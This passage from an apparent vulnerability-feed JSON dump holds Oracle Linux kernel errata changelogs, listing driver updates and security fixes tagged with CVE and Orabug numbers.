[960417 912842]\n- [fs] nfs: Do not accept delegated opens when a delegation recall is in effect (Steve Dickson) [960417 912842]\n- [fs] nfs: Fix a reboot recovery race when opening a file (Steve Dickson) [952613 908524]\n- [fs] nfs: Ensure delegation recall and byte range lock removal don't conflict (Steve Dickson) [952613 908524]\n- [fs] nfs: Fix up the return values of nfs4_open_delegation_recall (Steve Dickson) [952613 908524]\n- [fs] nfs: Dont lose locks when a server reboots during delegation return (Steve Dickson) [952613 908524]\n- [fs] nfs: Move nfs4_wait_clnt_recover and nfs4_client_recover_expired_lease (Steve Dickson) [952613 908524]\n- [fs] nfs: Add NFSDBG_STATE (Steve Dickson) [952613 908524]\n- [fs] nfs: nfs_inode_return_delegation() should always flush dirty data (Steve Dickson) [952613 908524]\n- [fs] nfs: nfs_client_return_marked_delegations cant flush data (Steve Dickson) [952613 908524]\n- [fs] nfs: Prevent deadlocks between state recovery and file locking (Steve Dickson) [952613 
908524]\n- [fs] nfs: Allow the state manager to mark an open_owner as being recovered (Steve Dickson) [952613 908524]\n- [kernel] seqlock: Dont smp_rmb in seqlock reader spin loop (Steve Dickson) [952613 908524]\n- [kernel] seqlock: add 'raw_seqcount_begin()' function (Steve Dickson) [952613 908524]\n- [kernel] seqlock: optimise seqlock (Steve Dickson) [952613 908524]\n- [fs] nfs: don't allow nfs_find_actor to match inodes of the wrong type (Jeff Layton) [921964 913660]\n- [net] sunrpc: Add barriers to ensure read ordering in rpc_wake_up_task_queue_locked (Dave Wysochanski) [956979 840860]\n[2.6.32-358.8.1]\n- [fs] raw: don't call set_blocksize when not changing the blocksize (Jeff Moyer) [951406 909482]\n- [x86] Allow greater than 1TB of RAM on AMD x86_64 sytems (Larry Woodman) [952570 876275]\n- [netdrv] ixgbe: Only set gso_type to SKB_GSO_TCPV4 as RSC does not support IPv6 (Michael S. Tsirkin) [927292 908196]\n- [netdrv] bnx2x: set gso_type (Michael S. Tsirkin) [927292 908196]\n- [netdrv] qlcnic: set gso_type (Michael S. Tsirkin) [927292 908196]\n- [netdrv] ixgbe: fix gso type (Michael S. 
Tsirkin) [927292 908196]\n- [fs] gfs2: Allocate reservation structure before rename and link (Robert S Peterson) [924847 922999]\n[2.6.32-358.7.1]\n- [infiniband] ipoib: Add missing locking when CM object is deleted (Doug Ledford) [928817 913645]", "edition": 4, "modified": "2013-06-11T00:00:00", "published": "2013-06-11T00:00:00", "id": "ELSA-2013-0911", "href": "http://linux.oracle.com/errata/ELSA-2013-0911.html", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1797", "CVE-2013-1848", "CVE-2013-1860", "CVE-2013-1792", "CVE-2012-6542", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-1929", "CVE-2013-1979", "CVE-2012-4542", "CVE-2013-2094", "CVE-2013-1796", "CVE-2013-1798"], "description": "[2.6.39-400.109.1] \r\n- while removing a non-empty directory, the kernel dumps a message: (rmdir,21743,1):ocfs2_unlink:953 ERROR: status = -39 (Xiaowei.Hu) [Orabug: 16790405] \r\n- stop mig handler when lockres in progress ,and return -EAGAIN (Xiaowei.Hu) [Orabug: 16876446] \r\n \n[2.6.39-400.108.1] \r\n- Revert 'dlmglue race condition,wrong lockres_clear_pending' (Maxim Uvarov) [Orabug: 16897450] \r\n- Suppress the error message from being printed in ocfs2_rename (Xiaowei.Hu) [Orabug: 16790405] \r\n- fnic: return zero on fnic_reset() success (Joe Jin) [Orabug: 16885029] \r\n \n[2.6.39-400.107.1] \r\n- xen/pci: Track PVHVM PIRQs. 
(Zhenzhong Duan) \r\n- ocfs2_prep_new_orphaned_file return ret (Xiaowei.Hu) [Orabug: 16823825] \r\n- Revert 'Btrfs: remove ->dirty_inode' (Guangyu Sun) [Orabug: 16841843] \r\n- bonding: emit event when bonding changes MAC (Weiping Pan) [Orabug: 16750157] \r\n- net: fix incorrect credentials passing (Linus Torvalds) [Orabug: 16836975] {CVE-2013-1979} \r\n- tg3: fix length overflow in VPD firmware parsing (Kees Cook) [Orabug: 16836958] {CVE-2013-1929} \r\n- USB: cdc-wdm: fix buffer overflow (Oliver Neukum) [Orabug: 16836943] {CVE-2013-1860} \r\n- ext3: Fix format string issues (Lars-Peter Clausen) [Orabug: 16836934] {CVE-2013-1848} \r\n- cnic: dont use weak dependencies for ipv6 (Jerry Snitselaar) [Orabug: 16780307] \r\n- Revert 'drm/i915: correctly order the ring init sequence' (Guangyu Sun) [Orabug: 16486689] \r\n- x86/boot-image: Dont leak phdrs in arch/x86/boot/compressed/misc.c::Parse_elf() (Jesper Juhl) [Orabug: 16833437] \r\n- spec: add /boot/vmlinuz*.hmac needed for fips mode (John Haxby) [Orabug: 16807114] \r\n- perf: Treat attr.config as u64 in perf_swevent_init() (Tommi Rantala) [Orabug: 16808734] {CVE-2013-2094} \r\n- spec: ol6 add multipath version deps (Maxim Uvarov) [Orabug: 16763586] \r\n- Fix EN driver to work with newer FWs based on latest mlx4_core (Yuval Shaia) [Orabug: 16748891] \r\n- xen-netfront: delay gARP until backend switches to Connected (Laszlo Ersek) \r\n- fuse: enhance fuse dev to be numa aware (Srinivas Eeda) [Orabug: 16218187] \r\n- fuse: add fuse numa node struct (Srinivas Eeda) [Orabug: 16218187] \r\n- fuse: add numa mount option (Srinivas Eeda) [Orabug: 16218187] \r\n- xen-blkfront: use a different scatterlist for each request (Roger Pau Monne) [Orabug: 16660413] \r\n- bonding: allow all slave speeds (Jiri Pirko) [Orabug: 16759490] \r\n- dlmglue race condition,wrong lockres_clear_pending (Xiaowei.Hu) [Orabug: 13611997] \r\n \n[2.6.39-400.106.0] \r\n- spec: fix suffix order of a directory name (Guangyu Sun) [Orabug: 16682371] \r\n- 
Merge tag 'v2.6.39-400#qu4bcom' of git://ca-git.us.oracle.com/linux-snits-public into uek2-master (Maxim Uvarov) [Orabug: 16626319] \r\n- Merge tag 'v2.6.39-400#qu4qlge' of git://ca-git.us.oracle.com/linux-snits-public into uek2-master (Maxim Uvarov) [Orabug: 16732027] \r\n- Merge tag 'v2.6.39-400#qu4lpfc' of git://ca-git.us.oracle.com/linux-snits-public into uek2-master (Maxim Uvarov) [Orabug: 16749881] \r\n- block: default SCSI command filter does not accomodate commands overlap across device classes (Jamie Iles) [Orabug: 16387137] {CVE-2012-4542} \r\n- Parallel mtrr init between cpus (Zhenzhong Duan) [Orabug: 16434164] \r\n- fuse: return -EGAIN if not connected (Josef Bacik) [Orabug: 16740418] \r\n- qlcnic: update to version 5.2.29.45 (Jerry Snitselaar) [Orabug: 16694438] \r\n- qlge: update to version 1.00.00.32 (Jerry Snitselaar) [Orabug: 16732027] \r\n- lpfc: Corrected Copyright string (Gairy Grannum) [Orabug: 16749881] \r\n- lpfc: enable BlockGuard Support by default (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed exhausted retry for plogi to nameserver. 
(James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed ELS_REC received on the unsolicited receive queue (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.36: Correct mask error (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.36: Correct buffer length overrun (James Smart) [Orabug: 16749881] \r\n- lpfc: typo cleanup (Linus Torvalds) [Orabug: 16749881] \r\n- lpfc 8.3.36: Update DIF support for passthru/strip/insert (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.36: Fix bug with Target Resets and FCP2 devices (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fixed not reporting logical link speed to SCSI midlayer when QoS not on (James Smart) [Orabug: 16749881] \r\n- lpfc: Update lpfc version for 8.3.7.10.4p driver release (Gairy Grannum) [Orabug: 16749881] \r\n- lpfc 8.3.35: Correct request_firmware use that was increasing boot times (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Correct request_firmware use that was increasing boot times (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed driver handling of CLEAR_LA with NPIV enabled causing SID=0 frames out (James Smart) [Orabug: 16749881] \r\n- scsi: fix lpfc build when wmb() is defined as mb() (Randy Dunlap) [Orabug: 16749881] \r\n- lpfc: Reduced tmo value set to FLOGI WQE for quick recovery from FLOGI sequence timeout (James Smart) [Orabug: 16749881] \r\n- lpfc: Add log message when completes with clean address bit set to zero (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed driver vector mapping to CPU affinity (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed driver vector mapping to CPU affinity (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed iocb flags not being reset for scsi commands (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed system panic during EEH recovery due to midlayer acting on outstanding I/O (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed not returning FAILED status when SCSI invoking host reset handler failed (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed bad book 
keeping in posting els sgls to port (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed deadlock between hbalock and nlp_lock use (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed BlockGuard to take advantage of rdprotect/wrprotect info when available (James Smart) [Orabug: 16749881] \r\n- lpfc: Reduced spinlock contention on SCSI buffer list (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed crash when processing bsgs sg list with high memory pages (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix lpfc_fcp_look_ahead module parameter (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with SCSI Host reset (James Smart) [Orabug: 16749881] \r\n- lpfc: Doorbell formation information logged in dual-chute mode WQ and RQ setup (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with large s/g lists for BlockGuard (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with large lpfc_sg_seg_cnt values (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed pt2pt and loop discovery problems on topology changes. (James Smart) [Orabug: 16749881] \r\n- lpfc: Remove driver dependency on HZ (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed async FCF modified event to in-use FCF failure to trigger recovery (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed BlockGuard error reporting (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed VPI allocation issues after firmware dump is performed (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed potential mis-interpretation of READ_TOPOLOGY reserved fields (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fix default value for lpfc_enable_rrq. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed circular locking dependency and inconsistent lock state issues (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed PT2PT bring up problem for FC SLI4. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed OXID reuse issue. 
(James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed async FCF modified event to in-use FCF failure to trigger recovery (James Smart) [Orabug: 16749881] \r\n- lpfc: fix potential NULL pointer dereference in lpfc_sli4_rq_put() (Wei Yongjun) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed deadlock condition in FCF round robin handling (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed bsg timeout handling issues that would result in crashes (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed NMI watch dog panics when resetting the hba. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed degraded performance after cable pulls (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Provide support for change_queue_type (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed infinite loop in lpfc_sli4_fcf_rr_next_index_get. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed crash due to SLI Port invalid resource count (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fix potential memory corruption bug (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Provide support for FCoE protocol dual-chute (ULP) operation (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed stale ndlp state when the node is marked for deferred removal. 
(James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Removed use of NOP mailboxes for interrupt verification (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Removed use of NOP mailboxes for interrupt verification (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fixed not checking solicition in progress bit when verifying FCF record for use (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fixed PRLI not being retried if a LS_RJT with a reason (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Correct request_firmware use that was increasing boot times (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Expand I/O channel support for large systems (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fix interrupt delay multipler conversion for eq_create (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Correct typecasts for snprintf messages (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add Interrupts per second stats via debugfs (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Adjust IO Channels to 1 when INTx (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Fix number of IO channels to match CPUs (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add debugfs interface to display SLI queue information (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Tie parallel I/O queues into separate MSIX vectors (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Allow per-hba interrupt rate tuning (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Tie parallel I/O queues into separate MSIX vectors (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Fixed debugfs queInfo to include queue stats (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add lpfc_fcp_look_ahead module parameter (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with SCSI Host reset (James Smart) [Orabug: 16749881] \r\n- lpfc: Doorbell formation information logged in dual-chute mode WQ and RQ setup (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with 
large s/g lists for BlockGuard (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with large lpfc_sg_seg_cnt values (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed pt2pt and loop discovery problems on topology changes. (James Smart) [Orabug: 16749881] \r\n- lpfc: Remove driver dependency on HZ (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed async FCF modified event to in-use FCF failure to trigger recovery (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed BlockGuard error reporting (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed VPI allocation issues after firmware dump is performed (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed potential mis-interpretation of READ_TOPOLOGY reserved fields (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fix default value for lpfc_enable_rrq. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed circular locking dependency and inconsistent lock state issues (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed PT2PT bring up problem for FC SLI4. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed OXID reuse issue. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed async FCF modified event to in-use FCF failure to trigger recovery (James Smart) [Orabug: 16749881] \r\n- lpfc: fix potential NULL pointer dereference in lpfc_sli4_rq_put() (Wei Yongjun) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed deadlock condition in FCF round robin handling (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed bsg timeout handling issues that would result in crashes (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed NMI watch dog panics when resetting the hba. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed degraded performance after cable pulls (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Provide support for change_queue_type (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed infinite loop in lpfc_sli4_fcf_rr_next_index_get. 
(James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed crash due to SLI Port invalid resource count (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fix potential memory corruption bug (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Provide support for FCoE protocol dual-chute (ULP) operation (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed stale ndlp state when the node is marked for deferred removal. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Removed use of NOP mailboxes for interrupt verification (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Removed use of NOP mailboxes for interrupt verification (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fixed not checking solicition in progress bit when verifying FCF record for use (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fixed PRLI not being retried if a LS_RJT with a reason (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Correct request_firmware use that was increasing boot times (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Expand I/O channel support for large systems (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fix interrupt delay multipler conversion for eq_create (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Correct typecasts for snprintf messages (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add Interrupts per second stats via debugfs (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Adjust IO Channels to 1 when INTx (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Fix number of IO channels to match CPUs (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add debugfs interface to display SLI queue information (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Tie parallel I/O queues into separate MSIX vectors (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Allow per-hba interrupt rate tuning (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Tie parallel I/O queues into separate MSIX vectors (James Smart) [Orabug: 16749881] 
\r\n- lpfc 8.3.33: Fixed debugfs queInfo to include queue stats (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add lpfc_fcp_look_ahead module parameter (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Allow per-hba interrupt rate tuning (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Parallelize SLI-4 Q distribution (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Allow per-hba interrupt rate tuning (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Make I/O to hw queue distribution algorithm a module parameter (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Change Naming convention for SLI4 Interrupt vector (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Allow per-hba interrupt rate tuning (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Tie parallel I/O queues into separate MSIX vectors (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Formally separate lpfc_sli_ring SLI-3 and SLI-4 variantions (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add Interrupts per second stats via debugfs (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Parallelize SLI-4 Q distribution (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Misc changes to optimize critical path (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Formally separate lpfc_sli_ring SLI-3 and SLI-4 variantions (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Convert to no SCSI host lock in queuecommand (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Convert to no SCSI host lock in queuecommand (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Convert to no SCSI host lock in queuecommand (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add debugfs interface to display SLI queue information (James Smart) [Orabug: 16749881] \r\n- bnx2x: update to broadcom version 1.76.54 (Jerry Snitselaar) \r\n- bnx2fc: update to broadcom version 2.3.4 (Jerry Snitselaar) \r\n- bnx2i: update to broadcom version 2.7.6.1d (Jerry Snitselaar) \r\n- cnic: update to broadcom version 
2.5.16g (Jerry Snitselaar) \r\n- bnx2: update to broadcom version 2.2.3n (Jerry Snitselaar) \r\n- tg3: update to broadcom version 3.129d (Jerry Snitselaar) \r\n- drivers:net: dma_alloc_coherent: use __GFP_ZERO instead of memset(, 0) (Joe Perches) \r\n- drivers:net: Remove dma_alloc_coherent OOM messages (Joe Perches) \r\n- be2net: Use new F/W mailbox cmd to manipulate interrupts. (Somnath Kotur) \r\n- be2net: enable interrupts in be_probe() (RoCE and other ULPs need them) (Somnath Kotur) \r\n- be2net: Update copyright year (Vasundhara Volam) \r\n- be2net: use CSR-BAR SEMAPHORE reg for BE2/BE3 (Sathya Perla) \r\n- benet: Wait f/w POST until timeout (Gavin Shan) \r\n- be2net: remove BUG_ON() in be_mcc_compl_is_new() (Sathya Perla) \r\n- be2net: update driver version to 4.6.x (Sathya Perla) \r\n- be2net: fix re-loaded PF driver to re-gain control of its VFs (Sathya Perla) \r\n- be2net: Updating Module Author string and log message string to 'Emulex Corporation' (Sarveshwar Bandi) \r\n- be2net: fix unconditionally returning IRQ_HANDLED in INTx (Sathya Perla) \r\n- ethtool: fix drvinfo strings set in drivers (Jiri Pirko) \r\n- be2net: fix wrong frag_idx reported by RX CQ (Sathya Perla) \r\n- be2net: fix be_close() to ensure all events are acked (Sathya Perla) \r\n- drivers/net: fix up function prototypes after __dev* removals (Greg Kroah-Hartman) \r\n- be2net: remove __dev* attributes (Bill Pemberton) \r\n- [scsi] fnic driver update to 1.5.0.41 (Maxim Uvarov) \r\n- [SCSI] sd: Permit merged discard requests (Martin K. Petersen) \r\n- [SCSI] scsi_dh_alua: backoff alua rtpg retry linearly vs. 
geometrically (Rob Evers) \r\n- [SCSI] scsi_dh_alua: retry alua rtpg extended header for illegal request response (Rob Evers) \r\n- [SCSI] scsi_dh_alua: implement 'implied transition timeout' (Rob Evers) \r\n- [SCSI] scsi_dh_alua: Fix the time inteval for alua rtpg commands (Moger, Babu) \r\n- [SCSI] scsi_dh_alua: Decrease retry interval (Hannes Reinecke) \r\n- [SCSI] scsi_dh_alua: Fix Erroneous TPG ID check (Hannes Reinecke) \r\n- [SCSI] scsi_dh_alua: always update TPGS status on activate (Hannes Reinecke) \r\n- [SCSI] scsi scan: dont fail scans when host is in recovery (Mike Christie) \r\n- [SCSI] scsi_lib: pause between error retries (James Smart) \r\n- RDS: Fixes race conditions that may lead to non-optimal paths, causing lower throughput. (Bang Nguyen) [Orabug: 16571410] \r\n- Merge tag 'v2.6.39-400.20.1.16313854' of git://ca-git.us.oracle.com/linux-uek-2.6.39-ofed into uek2-master (Maxim Uvarov) [Orabug: 16313854] \r\n- sched: Use resched IPI to kick off the nohz idle balance (Suresh Siddha) [Orabug: 16424589] \r\n- x86, efi/efi.c: Suppress error message when desc_size not equal size from UEFI Porting from Yinghais patch from following link http://permalink.gmane.org/gmane.linux.kernel/1131668 x86, efi: Only print warning when desc_size is smaller than defined one. Used to suppress the error message when desc_size not equal size from UEFI. (ethan.zhao) [Orabug: 15814305] \r\n- SPEC: add x86_energy_perf_policy tool Add tools/power/x86/x86_energy_perf_policy/x86_energy_perf_policy to ol5 ol6 uek kernel rpmbuild spec file and create shell wrapper for this tool. 
(ethan.zhao) [Orabug: 16036151] \r\n- igbvf: Update to 2.0.4 (ethan.zhao) [Orabug: 16626308] \r\n- ixgbevf: Update to 2.8.7 (ethan.zhao) [Orabug: 16626308] \r\n- ixgbe: Update to 3.14.5 (ethan.zhao) [Orabug: 16626308] \r\n- igb: Update to 4.1.2 (ethan.zhao) [Orabug: 16626308] \r\n- e1000e: Update to 2.3.2 (ethan.zhao) [Orabug: 16626308] \r\n \n[2.6.39-400.105.0] \r\n- Revert 'Parallel mtrr init between cpus' (Maxim Uvarov) \r\n \n[2.6.39-400.104.0] \r\n- Merge tag 'v2.6.39-400.20.1.16313854' of git://ca-git.us.oracle.com/linux-uek-2.6.39-ofed into uek2-master (Maxim Uvarov) [Orabug: 16313854] \r\n- spec: fix instalation if hardlink is installed (Maxim Uvarov) \r\n- Parallel mtrr init between cpus (Zhenzhong Duan) \r\n- KVM: x86: Convert MSR_KVM_SYSTEM_TIME to use gfn_to_hva_cache functions (CVE-2013-1797) (Andy Honig) [Orabug: 16711660] {CVE-2013-1797} \r\n- Bluetooth: Fix incorrect strncpy() in hidp_setup_hid() (Anderson Lizardo) [Orabug: 16711065] {CVE-2013-0349} \r\n- USB: io_ti: Fix NULL dereference in chase_port() (Wolfgang Frisch) [Orabug: 16425358] {CVE-2013-1774} \r\n- keys: fix race with concurrent install_user_keyrings() (David Howells) [Orabug: 16493354] {CVE-2013-1792} \r\n- KVM: Fix bounds checking in ioapic indirect register reads (CVE-2013-1798) (Andy Honig) [Orabug: 16710951] {CVE-2013-1798} \r\n- KVM: x86: fix for buffer overflow in handling of MSR_KVM_SYSTEM_TIME (CVE-2013-1796) (Andy Honig) [Orabug: 16710806] {CVE-2013-1796} \r\n- be2iscsi : Bump the driver version (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix issue in passing the exp_cmdsn and max_cmdsn (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix possible reentrancy issue in be_iopoll (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix the copyright information (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix checking Adapter state while establishing CXN (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix dynamic CID allocation Mechanism in driver (John Soni 
Jose) [Orabug: 16704553] \r\n- be2iscsi : Fix the NOP-In handling code path (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix the Port Link Status issue (John Soni Jose) [Orabug: 16704553] \r\n- beiscsi: Fix displaying the Active Session Count from driver (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix displaying the FW Version from driver. (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix support for DEFQ extension (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix MACRO for checking the adapter type (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix freeing CXN specific driver resources. (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix MSIx support in SKH-R to 32 (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix MBX Command issues (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix when MBX fails with Insufficient buffer error (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Send uninitialize pattern to FW (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Get Port State and Speed of the Adapter (John Soni Jose) [Orabug: 16704553] \r\n- hpwdt: Only BYTE reads/writes to WD Timer port 0x72 (Mingarelli, Thomas) \r\n- misc: hpilo: ignore auxiliary HP iLO BMCs (Mark Rusk) \r\n- MISC: hpilo, remove pci_disable_device (Jiri Slaby) \r\n- misc: hpilo: increase number of max supported channels (Camuso, Tony) \r\n- Fix device removal NULL pointer dereference (Joe Jin) [Orabug: 16684527] \r\n- put stricter guards on queue dead checks (James Bottomley) [Orabug: 16684527] \r\n- RDS: Fixes race conditions that may lead to non-optimal paths, causing lower throughput (Bang Nguyen) [Orabug: 16571410] \r\n- 8139cp: Prevent dev_close/cp_interrupt race on MTU change (John Greene) \r\n- 8139cp: properly support change of MTU values [v2] (John Greene) \r\n- 8139cp: fix coherent mapping leak in error path. 
(francois romieu) \r\n- 8139cp: re-enable interrupts after tx timeout (David Woodhouse) \r\n- 8139cp: set ring address after enabling C+ mode (David Woodhouse) \r\n- 8139cp: revert 'set ring address before enabling receiver' (francois romieu) \r\n- sched: Use resched IPI to kick off the nohz idle balance (Suresh Siddha) [Orabug: 16424589] \r\n- llc: fix info leak via getsockname() (Mathias Krause) [Orabug: 16675488] {CVE-2012-6542} \r\n- qla4xxx: update driver version to v5.03.00.02.06.02-uek2 (Tej Parkash) \r\n- qla4xxx: Silence the compile warning for uint comparison (Adheer Chandravanshi) \r\n- qla4xxx: changing default behaviour of ql4xdisablesysfsboot to true (Tej Parkash) \r\n- qla4xxx: Silence gcc warning for uninitialized veriable (Vikas Chaudhary) \r\n- qla4xxx: Added print statements to display AENs (Vikas Chaudhary) \r\n- qla4xxx: Use correct value for max flash node entries (Adheer Chandravanshi) \r\n- qla4xxx: Restrict logout from boot target session using session id (Adheer Chandravanshi) \r\n- qla4xxx: Use correct flash ddb offset for ISP40XX (Adheer Chandravanshi) \r\n- qla4xxx: Replace dev type macros with generic portal type macros (Adheer Chandravanshi) \r\n- scsi_transport_iscsi: Declare portal type string macros for generic use (Adheer Chandravanshi) \r\n- qla4xxx: Add flash node mgmt support (Adheer Chandravanshi) \r\n- libiscsi: export function iscsi_switch_str_param (Adheer Chandravanshi) \r\n- scsi_transport_iscsi: Add flash node mgmt support (Adheer Chandravanshi) \r\n- qla4xxx: Skip retry of initialize_adapter only for ISP8XXX (Nilesh Javali) \r\n- qla4xxx: Assign correct CHAP table address to FLT (Vikas Chaudhary) \r\n- qla4xxx: Added missing check for ISP83XX in CHAP related functions (Vikas Chaudhary) \r\n- qla4xxx: dont free NULL dma pool (Dan Carpenter) \r\n- qla4xxx: Fixed request queue count manipulation on response path (Tej Parkash) \r\n- qla4xxx: Fix debug level to avoid floods of same message (Vikas Chaudhary) \r\n- qla4xxx: 
